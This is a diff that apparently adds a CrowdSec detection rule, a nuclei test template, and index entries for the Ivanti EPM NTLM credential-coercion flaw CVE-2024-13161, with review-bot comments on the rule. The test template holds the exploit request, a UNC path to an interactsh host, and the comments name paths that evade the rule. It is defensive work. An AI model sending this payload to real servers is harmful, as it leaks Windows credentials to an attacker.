diff --git a/.appsec-tests/CVE-2024-13161/CVE-2024-13161.yaml b/.appsec-tests/CVE-2024-13161/CVE-2024-13161.yaml
new file mode 100644
index 00000000000..c348f171bb0
--- /dev/null
+++ b/.appsec-tests/CVE-2024-13161/CVE-2024-13161.yaml
@@ -0,0 +1,30 @@
+## autogenerated on 2025-03-13 18:21:48
+id: CVE-2024-13161
+info:
+ name: CVE-2024-13161
+ author: crowdsec
+ severity: info
+ description: CVE-2024-13161 testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: text/xml
+ Soapaction: http://tempuri.org/GetHashForSingleFile
+
+
+
+
+
+ \\{{interactsh-url}}\tmp\{{file}}.txt
+
+
+
+ cookie-reuse: true
+ matchers:
+ - type: status
+ status:
+ - 403
\ No newline at end of file
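Review bot: The request body at L24-L31 shows only the bare UNC path `\\{{interactsh-url}}\tmp\{{file}}.txt` with no SOAP envelope or `<wildcard>` element around it; that may be an artifact of how this page was rendered, but the companion rule's BODY regex (L110) requires a literal `</wildcard>` after the path, so if the test really sends the path unwrapped the rule cannot fire and the `403` matcher at L36 would fail rather than prove the virtual patch. Also `{{file}}` is not declared in a `variables:` section of this template, so it is either resolved from elsewhere or left literal — worth pinning with something like `variables:` / `file: test` so the payload is deterministic. Finally, because this test only sends the exact PoC shape (`\tmp\...\.txt`), it cannot detect that the rule is overfitted to that shape; a second request with a different UNC path, e.g. `\\{{interactsh-url}}\share\x.xml`, would make the test meaningful as a regression check for evasion.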
diff --git a/.appsec-tests/CVE-2024-13161/config.yaml b/.appsec-tests/CVE-2024-13161/config.yaml
new file mode 100644
index 00000000000..ea4329dc9e6
--- /dev/null
+++ b/.appsec-tests/CVE-2024-13161/config.yaml
@@ -0,0 +1,4 @@
+## autogenerated on 2025-03-13 18:21:48
+appsec-rules:
+ - ./appsec-rules/crowdsecurity/CVE-2024-13161.yaml
+nuclei_template: CVE-2024-13161.yaml
\ No newline at end of file
diff --git a/.index.json b/.index.json
index 8647303e101..7f0c6f4f6b0 100644
--- a/.index.json
+++ b/.index.json
@@ -82,6 +82,32 @@
}
},
"appsec-rules": {
+ "crowdsecurity/CVE-2024-13161": {
+ "path": "appsec-rules/crowdsecurity/CVE-2024-13161.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "e0e0fef36d175cd395b7e7949db765a9dbedd432b8f82235fbd5b2df2ea5353c",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2024-13161",
+ "attack.T1210",
+ "cwe.CWE-36"
+ ],
+ "confidence": 3,
+ "label": "Ivanti EPM Credential Coercion",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
"crowdsecurity/base-config": {
"path": "appsec-rules/crowdsecurity/base-config.yaml",
"version": "0.1",
diff --git a/appsec-rules/crowdsecurity/CVE-2024-13161.yaml b/appsec-rules/crowdsecurity/CVE-2024-13161.yaml
new file mode 100644
index 00000000000..f2bf3d85940
--- /dev/null
+++ b/appsec-rules/crowdsecurity/CVE-2024-13161.yaml
@@ -0,0 +1,30 @@
+## autogenerated on 2025-03-13 18:21:48
+name: crowdsecurity/CVE-2024-13161
+description: 'Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM'
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: /wsvulnerabilitycore/vulcore.asmx
+ - zones:
+ - BODY
+ transform:
+ - lowercase
+ match:
+ type: regex
+ value: '\\\\.*\\tmp\\.*\.txt<\/wildcard>'
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: 'http:exploit'
+ label: 'Ivanti EPM Credential Coercion'
+ classification:
+ - cve.CVE-2024-13161
+ - attack.T1210
+ - cwe.CWE-36
\ No newline at end of file
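Review bot: The BODY regex at L110, `'\\\\.*\\tmp\\.*\.txt<\/wildcard>'`, is fitted to the PoC rather than to the vulnerability: it only fires when the UNC path contains a `\tmp\` segment and ends in `.txt`, so an attacker who coerces authentication with `\\attacker\share\x` or any other filename walks straight past the rule. The coercion primitive is the UNC path itself, so the match should be on "a `\\host\...` path inside the wildcard element", e.g. `value: '\\\\[^\\<]+\\[^<]*<\/wildcard>'` (still under the existing `lowercase` transform). Note the rule also never checks the `SOAPAction` header or the operation name in the body, so a second `and:` term on BODY for `gethashforsinglefile` would tie the match to the endpoint the description claims; I cannot tell from this hunk whether the product legitimately submits UNC paths here, so if it does, an allowlist of internal hosts may be needed to avoid false positives.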
diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml
index 3f4745dfd60..302eea1214d 100644
--- a/collections/crowdsecurity/appsec-virtual-patching.yaml
+++ b/collections/crowdsecurity/appsec-virtual-patching.yaml
@@ -81,6 +81,7 @@ appsec-rules:
- crowdsecurity/vpatch-CVE-2024-51378
- crowdsecurity/vpatch-CVE-2024-41713
- crowdsecurity/vpatch-CVE-2024-6205
+- crowdsecurity/CVE-2024-13161.yaml
author: crowdsecurity
contexts:
- crowdsecurity/appsec_base
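Review bot: The new collection entry at L131, `- crowdsecurity/CVE-2024-13161.yaml`, carries a `.yaml` extension, unlike every other item in this list and unlike the rule's own `name: crowdsecurity/CVE-2024-13161` (L93) and its index key (L57); hub resolution keys on the item name, so this entry will most likely fail to resolve or pull nothing into the collection. It should be `- crowdsecurity/CVE-2024-13161`. Separately, every sibling rule here follows the `crowdsecurity/vpatch-CVE-…` naming convention, so consider renaming the rule (and its index/taxonomy entries) to `crowdsecurity/vpatch-CVE-2024-13161` for consistency.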
diff --git a/taxonomy/scenarios.json b/taxonomy/scenarios.json
index 382b3b0f7e5..ab9f03d8d4e 100644
--- a/taxonomy/scenarios.json
+++ b/taxonomy/scenarios.json
@@ -1,4 +1,26 @@
{
+ "crowdsecurity/CVE-2024-13161": {
+ "name": "crowdsecurity/CVE-2024-13161",
+ "description": "Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM",
+ "label": "Ivanti EPM Credential Coercion",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0008:T1210"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "created_at": "2025-03-13 18:21:51",
+ "cves": [
+ "CVE-2024-13161"
+ ],
+ "cwes": [
+ "CWE-36"
+ ]
+ },
"crowdsecurity/generic-freemarker-ssti": {
"name": "crowdsecurity/generic-freemarker-ssti",
"description": "Generic FreeMarker SSTI",